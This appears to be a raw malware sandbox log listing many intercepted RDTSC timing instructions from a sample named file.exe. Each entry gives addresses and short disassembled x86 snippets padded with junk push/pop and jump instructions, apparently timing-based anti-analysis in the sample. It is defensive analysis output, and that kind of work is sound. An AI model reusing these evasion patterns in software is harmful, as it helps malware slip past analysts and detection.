Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5B0B9 second address: B5B0F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F620450A758h 0x0000000f push edi 0x00000010 jmp 00007F620450A757h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5B0F5 second address: B5B0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5B0FA second address: B5B0FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5B27A second address: B5B280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5B96E second address: B5B99A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A74Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jg 00007F620450A746h 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F620450A74Eh 0x00000019 push esi 0x0000001a pop esi 0x0000001b jp 00007F620450A746h 0x00000021 push ecx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5B99A second address: B5B9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5C0B9 second address: B5C0BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5C0BD second address: B5C0C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5C0C1 second address: B5C0C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B648DC second address: B648E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B648E5 second address: B648E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B648E9 second address: B648ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B64C04 second address: B64C18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F620450A746h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007F620450A762h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7110E second address: B71114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B71114 second address: B7112A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F620450A750h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75A87 second address: B75A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75A90 second address: B75A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75BE1 second address: B75BEB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75BEB second address: B75BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75BEF second address: B75BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75BF3 second address: B75C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jnl 00007F620450A746h 0x00000010 jmp 00007F620450A74Ah 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75C0F second address: B75C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B75C14 second address: B75C20 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F620450A74Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78B79 second address: B78B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78B7D second address: B78B83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B789CA second address: B789E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6204BE6487h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B789E8 second address: B789ED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B789ED second address: B789FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F6204BE6476h 0x0000000a pop edx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B789FE second address: B78A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B78A09 second address: B78A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7D271 second address: B7D275 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7D275 second address: B7D280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7D280 second address: B7D293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F620450A74Ah 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7D293 second address: B7D29D instructions: 0x00000000 rdtsc 0x00000002 je 00007F6204BE6476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B7D29D second address: B7D2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B884FF second address: B88505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B88505 second address: B8850A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8850A second address: B88525 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F6204BE6482h 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8F105 second address: B8F109 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8F109 second address: B8F10F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8F10F second address: B8F147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F620450A755h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 jmp 00007F620450A754h 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8F537 second address: B8F547 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6204BE6476h 0x00000008 js 00007F6204BE6476h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8F547 second address: B8F561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F620450A750h 0x00000009 ja 00007F620450A746h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8F6AC second address: B8F6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F6204BE6480h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8F6C8 second address: B8F6CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8F6CE second address: B8F6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F6204BE6484h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8F6EA second address: B8F704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F620450A750h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B8F704 second address: B8F720 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6204BE6486h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B92FA4 second address: B92FAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B95FEF second address: B95FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B95FFA second address: B95FFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B95FFE second address: B96042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 jmp 00007F6204BE6489h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ebx 0x00000010 jmp 00007F6204BE6487h 0x00000015 pushad 0x00000016 push edx 0x00000017 pop edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B96042 second address: B9604A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9DDDF second address: B9DDE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9DDE5 second address: B9DDF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c ja 00007F620450A746h 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B9DDF8 second address: B9DDFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA4D41 second address: BA4D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6BDD second address: BA6BF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE647Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6BF0 second address: BA6BF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6BF4 second address: BA6BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA6BF8 second address: BA6C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F620450A746h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007F620450A74Ah 0x00000016 pushad 0x00000017 popad 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA9ED9 second address: BA9EDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BA9EDD second address: BA9EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F620450A746h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6282 second address: BB628B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB628B second address: BB6293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6293 second address: BB6297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB6297 second address: BB629D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB5E64 second address: BB5E6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB5E6A second address: BB5E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB5FA4 second address: BB5FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB5FAB second address: BB5FB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BB9626 second address: BB962A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD1715 second address: BD171B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD171B second address: BD171F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD171F second address: BD1725 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD05F7 second address: BD05FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD05FC second address: BD0602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0602 second address: BD0612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6204BE6476h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0742 second address: BD0748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0748 second address: BD0752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6204BE6476h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0752 second address: BD0776 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A759h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0776 second address: BD077B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0B5C second address: BD0B77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A757h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0B77 second address: BD0B7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0B7C second address: BD0B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F620450A746h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0B90 second address: BD0B94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0E51 second address: BD0E68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F620450A74Fh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0E68 second address: BD0E72 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6204BE6495h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD0FE6 second address: BD1013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push esi 0x00000009 jmp 00007F620450A752h 0x0000000e jmp 00007F620450A74Ch 0x00000013 pop esi 0x00000014 push eax 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD1176 second address: BD1191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6204BE6486h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD74B4 second address: BD74BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: BD8ED7 second address: BD8EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5320F12 second address: 5320F22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F620450A74Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5320F22 second address: 5320F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5320F26 second address: 5320F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F620450A756h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5320F49 second address: 5320F58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6204BE647Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5320F58 second address: 5320FB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F620450A759h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov al, 2Ah 0x0000000f jmp 00007F620450A759h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 mov di, si 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F620450A756h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310DA5 second address: 5310DD4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6204BE6482h 0x00000008 and ax, 1048h 0x0000000d jmp 00007F6204BE647Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov edx, eax 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350A78 second address: 5350ABB instructions: 0x00000000 rdtsc 0x00000002 mov dx, 3A5Ch 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 pushfd 0x00000011 jmp 00007F620450A759h 0x00000016 or esi, 5E3E1D66h 0x0000001c jmp 00007F620450A751h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F00A5 second address: 52F00AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F00AA second address: 52F00B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F00B0 second address: 52F00B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F00B4 second address: 52F00B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
